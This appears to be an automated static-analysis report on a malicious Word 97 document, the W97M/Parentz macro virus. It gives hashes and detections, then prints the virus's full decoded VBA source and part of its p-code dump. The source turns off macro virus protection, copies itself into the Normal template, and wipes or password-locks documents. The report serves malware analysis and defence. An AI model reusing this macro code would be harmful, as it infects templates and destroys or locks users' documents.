Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8d2693d4afb07b6…

MALICIOUS

Office (OLE)

30.5 KB Created: 2000-08-09 14:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d59009d43a628ed0bb257d757fe67496 SHA-1: 0eb31c4879fc854d48d76495ed4e6ae46bc94d85 SHA-256: c8d2693d4afb07b6ea96a61967b7a00d24d0ef87385140a50f86ff0fa23254f4
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious Office documents. The macro attempts to disable virus protection and modify document settings, and also sets the application caption to 'Mum.. Dad.. Fuck U !!' and the user address to 'W97M/Parentz'. It also attempts to set document passwords to 'ashley'. The presence of the Document_Open macro and the nature of the script strongly suggest it is designed to execute malicious actions upon opening the document, likely as a spearphishing attachment.

Heuristics 3

  • ClamAV: Doc.Trojan.Chameleon-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Chameleon-13
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8155 bytes
SHA-256: 92d8f09bb4d2745ae024934f2bc040b8e075fcd4fe5608fd86bb1b91cab7862d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "MVP") <> "Enabled by Total Konfuzion" Then
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
            .SavePropertiesPrompt = (Rnd * 0)
        End With
        With Application
            .EnableCancelKey = wdCancelDisabled
            .Caption = "Mum.. Dad.. Fuck U !!"
            .UserAddress = "W97M/Parentz"
        End With
        If Day(Now) >= "26" Then
            With Selection.Find
                .Text = "the"
                .Replacement.Text = "Mum.. Dad.. Fuck U !!"
                .Forward = (Rnd * 0)
                .Wrap = wdFindContinue
                .Format = (Rnd * 0) + 1
                .MatchCase = (Rnd * 0)
                .MatchWholeWord = (Rnd * 0) + 1
                .MatchWildcards = (Rnd * 0)
                .MatchSoundsLike = (Rnd * 0)
                .MatchAllWordForms = (Rnd * 0)
            End With
            With ActiveDocument
                .ReadOnlyRecommended = (Rnd * 0) + 1
                .Password = "ashley"
                .WritePassword = "ashley"
            End With
        Else
            With Selection
                .HomeKey Unit:=wdStory
                .EndKey Unit:=wdStory, Extend:=wdExtend
                .Delete Unit:=wdCharacter, Count:=1
                .ParagraphFormat.Alignment = wdAlignParagraphCenter
                .Font.Name = "Arial"
                .Font.Size = 14
                .Font.Bold = (Rnd * 0) + 1
                .Font.Italic = (Rnd * 0) + 1
                .TypeText Text:="Mum.. Dad.. all u given me in the last few monthz iz shit !!.. this 1'z 4 u !!"
            End With
        End If
        If ThisDocument = ActiveDocument Then Set i = NormalTemplate Else Set i = ActiveDocument
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        Set d = i.VBProject.VBComponents.Item(1).CodeModule
        d.DeleteLines 1, d.CountOfLines
        d.AddFromString Vx
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
    End If
' W97M/Parentz
'   by: Total Konfuzion
' Mum.. Dad.. all u given me over the last few monthz
' iz shit !!.. so I dedic8 this 1 4 u !!.. Fuck U all !!   >8)
' Don't worry.. this WILL find its way to ur work systemz !!   >8)
End Sub


' Processing file: /opt/analyzer/scan_staging/57f5904de2ad492ba03a75a4a13af366.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4334 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Open())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitStr 0x0000 ""
' 	LitStr 0x003C "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
' 	LitStr 0x0003 "MVP"
' 	Ld System 
' 	ArgsMemLd PrivateProfileString 0x0003 
' 	LitStr 0x001A "Enabled by Total Konfuzion"
' 	Ne 
' 	IfBlock 
' Line #3:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' Line #4:
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	MemStWith VirusProtection 
' Line #5:
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	MemStWith SaveNormalPrompt 
' Line #6:
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	MemStWith ConfirmConversions 
' Line #7:
' 	Ld Rnd 
' 	LitDI2 0x0000 
' 	Mul 
' 	Paren 
' 	MemStWith SavePropertiesPrompt 
' Line #8:
' 	EndWith 
' Line #9:
' 	StartWithExpr 
' 	Ld Application 
' 	With 
' Line #10:
' 	Ld wdCancelDisabled 
' 	MemStWith EnableCancelKey 
' Line #11:
' 	LitStr 0x0015 "Mum.. Dad.. Fuck U !!"
' 	MemStWith Caption 
' Line #12:
' 	LitStr 0x000C 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.